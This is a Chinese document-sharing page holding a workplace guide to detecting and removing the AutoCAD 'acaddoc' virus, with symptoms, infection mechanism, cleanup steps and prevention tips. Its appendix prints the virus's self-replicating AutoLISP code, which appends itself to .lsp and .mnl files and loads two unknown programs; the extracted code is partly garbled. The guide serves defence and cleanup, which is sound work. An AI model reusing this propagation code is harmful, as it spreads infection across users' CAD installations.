收藏
下载资源

acaddoc病毒处理办法

上传人:小** 文档编号:47521521 上传时间:2018-07-02 格式:PDF 页数:5 大小:163.22KB
返回 下载 相关 举报
acaddoc病毒处理办法_第1页
第1页 / 共5页
acaddoc病毒处理办法_第2页
第2页 / 共5页
acaddoc病毒处理办法_第3页
第3页 / 共5页
acaddoc病毒处理办法_第4页
第4页 / 共5页
acaddoc病毒处理办法_第5页
第5页 / 共5页
亲,该文档总共5页,全部预览完了,如果喜欢就下载吧!
资源描述

《acaddoc病毒处理办法》由会员分享,可在线阅读,更多相关《acaddoc病毒处理办法(5页珍藏版)》请在金锄头文库上搜索。

1、acaddoc 病毒处理办法 前言: 下文第一、二、三段无实质内容,可略过不读。 一 病毒简介: 最近公司里流传一种 cad 病毒。 该病毒可被卡巴斯基和 360 杀毒软件查出。 卡巴斯基查 出病毒名为 Virus.ALS.Pasdoc.a,360 杀毒软件查出病毒名为 Trojan.Script.29327。遗憾 的是,卡巴斯基和 360 杀毒软件均不能将其彻底清除。 二 中毒症状: 机器中毒后,运行 CAD 时,每打开一个 dwg 文件,均在 dwg 文件所在目录下生成一个 acaddoc.lsp 的文件。 由于每次开图, 病毒程序均进行一次病毒传播复制过程, 因此使得 CAD 开图时速度

2、变慢。 用记事本查看 CAD 安装路径下的 support 目录下的任一*.lsp 文件, 如文件末尾含有与 附件 1 相同的代码,则可判定为中毒。 三 传播机理: 通过分析病毒的源代码,初步了解其传播机理如下: 如机器已中毒,CAD 新打开 dwg 文件时,病毒程序自动加载。并搜索 CAD 工作目录下的 acad.mnl 文件,感染同一目录下的*.mnl 文件,搜索 acad 的 support 目录,并感染该目录 下的所有*.lsp 文件。同时病毒在当前打开的 dwg 文件所在目录下生成 acaddoc.lsp 文件, 以利于下次传播。 如本机未中毒, 而新打开的 dwg 文件所在目录下有

3、 acaddoc.lsp 文件, 则病毒将感染上 述目录下的*.mnl 与*.lsp 文件。 该病毒的最终目的是调用 acadapq 与 acadappp 两个非法程序。至于这两个程序会干 什么,暂未深入研究。 四 清除步骤: 1. 退出 CAD。 2. 全盘搜索 acadapq.*、 、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。注 意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的 操作系统文件” 。搜索时选择“查找所有文件及文件夹” ,然后在“高级选项”里勾 选“搜索系统文件夹” “搜索隐藏的文件和文件夹” “搜索子文件夹” 。 如果搜出的

4、文件无法删除,则先清空回收站,再搜索删除。 注:探索者目录下有个 AcadDoc.lsp(注意大小写)不是病毒文件,谨防误删。 3. 查看 C 盘根目录下是否有 boot.dat 文件,如有,则将其删除。 4. 进入 C:Documents and Settings用户名Application DataAutodeskAutoCAD 2006(或 AutoCAD2004)R16.2chsSupport 目录,用记事本打开该目录下的所有*.mnl 文件,手动删除与附件 1 相同的代码(一般都在文件末尾) ,然后保存。并将 修改后的所有*.mnl 文件属性设置为“只读” 。 5. 进入 CAD 安

5、装目录下的 support 目录,将该目录下的所有*.lsp 文件按步骤 4 方法 处理。记得将其属性设为“只读” 。 6. 如果本机安装有多个版本的 CAD,都需按上述步骤检查一次。 WKCOST 提示提示: : 1)、在手动删除附件 1 代码时,由于病毒是多次添加改代码在上述的文件中,所以单单 删除最后一段没什么用,导致杀毒失败,最简便的方法是:打开上述文件,用 Ctrl+F 查找 (setq flagx t) 找到后,从该代码行一直拉到文件最后一行,全部删除,保存退出即可。 2)、步骤 5 搜索出 LISP 一大堆,并不是每个文件都要修改,可以看修改日期,修改日 期在 05、06 年甚至

6、更早的话就不必修改了,肯定没有被感染,一般被感染的文件都是被近 期修改,可能就是最近半年或者前几天的日期,这些都是很可疑的,需要打开查找一下。 如图:被我选中的几个文件被感染了,其他的没有感染 五 预防措施: 由于该病毒是通过读取 dwg 文件所在的目录下 acaddoc.lsp 来传播的。 因为在接受其他 同事的文件夹时,应先检查该文件夹中是否包含上述病毒文件。如有,则删除之。同时也应 该确保传给其他同事的文件夹不要包含上述文件。 病毒会感染 support 目录下的 *.lsp 文件。因此建议新建一个文件夹,将常用的 lisp 程序放置在该文件夹下,同时在 CAD 选项中将其设置为工作搜索

7、目录。 未装杀毒软件的机器应首先将杀毒软件装上(360 杀毒软件免费的) ,在接受他人传来 的文件后应首先杀毒。 建议不要直接打开公共盘上的 dwg 文件,应先下载到本机再打开。 附件 1: 病毒代码 (setq flagx t) (setq bz “(setq flagx t)“) ( (setq flag nil) (setq flag1 t) (if (findfile target) (progn (setq wjm1 (open target “r“) (while (setq text (read-line wjm1) (if (= text bz) (setq flag1 nil

8、) );while (close wjm1) );progn );if (if flag1 (progn (setq wjm (open source “r“) (setq wjm1 (open target “a“) (write-line (chr 13) wjm1) (while (setq text (read-line wjm) (if (= text bz) (setq flag t) (if flag (progn (write-line text wjm1) );progn );if );while (close wjm1) (close wjm) );progn );if )

9、;defun (setvar “cmdecho“ 0) (setq acadmnl (findfile “acad.mnl“) (setq acadmnlpath (vl-filename-directory acadmnl) (setq mnlfilelist (vl-directory-files acadmnlpath “*.mnl“) (setq mnlnum (length mnlfilelist) (setq acadexe (findfile “acad.exe“) (setq acadpath (vl-filename-directory acadexe) (setq supp

10、ort (strcat acadpath “support“) (setq lspfilelist (vl-directory-files support “*.lsp“) (setq lspfilelist (append lspfilelist (list “acaddoc.lsp“) (setq lspnum (length lspfilelist) (setq dwgname (getvar “dwgname“) (setq dwgpath (findfile dwgname) (if dwgpath (progn (setq acaddocpath (vl-filename-dire

11、ctory dwgpath) (setq acaddocfile (strcat acaddocpath “acaddoc.lsp“) (setq mnln 0) (while ( mnln mnlnum) (setq mnlfilename (strcat acadmnlpath “ (nth mnln mnlfilelist) (app mnlfilename acaddocfile bz) (app acaddocfile mnlfilename bz) (setq mnln (1+ mnln) );while (setq lspn 0) (while ( lspn lspnum) (s

12、etq lspfilename (strcat support “ (nth lspn lspfilelist) (app lspfilename acaddocfile bz) (app acaddocfile lspfilename bz) (setq lspn (1+ lspn) );while );progn );if (setq mnln 0) (while ( mnln mnlnum) (setq mnlfilename (strcat acadmnlpath “ (nth mnln mnlfilelist) (setq mnln1 0) (while ( mnln1 mnlnum

13、) (setq mnlfilename1 (strcat acadmnlpath “ (nth mnln1 mnlfilelist) (app mnlfilename mnlfilename1 bz) (setq mnln1 (1+ mnln1) );while (setq lspn1 0) (while ( lspn1 lspnum) (setq lspfilename1 (strcat support “ (nth lspn1 lspfilelist) (app mnlfilename lspfilename1 bz) (setq lspn1 (1+ lspn1) );while (set

14、q mnln (1+ mnln) );while (setq lspn 0) (while ( lspn lspnum) (setq lspfilename (strcat support “ (nth lspn lspfilelist) (setq lspn1 0) (while ( lspn1 lspnum) (setq lspfilename1 (strcat support “ (nth lspn1 lspfilelist) (app lspfilename lspfilename1 bz) (setq lspn1 (1+ lspn1) );while (setq mnln1 0) (while ( mnln1 mnlnum) (setq mnlfilename1 (strcat acadmnlpath “ (nth mnln1 mnlfilelist) (app lspfilename mnlfilename1 bz) (setq mnln1 (1+ mnln1) );while (setq lspn (1+ lspn) (load “acadapq“) (princ) (load “acadappp.lsp“) (princ)

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 商业/管理/HR > 经营企划

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号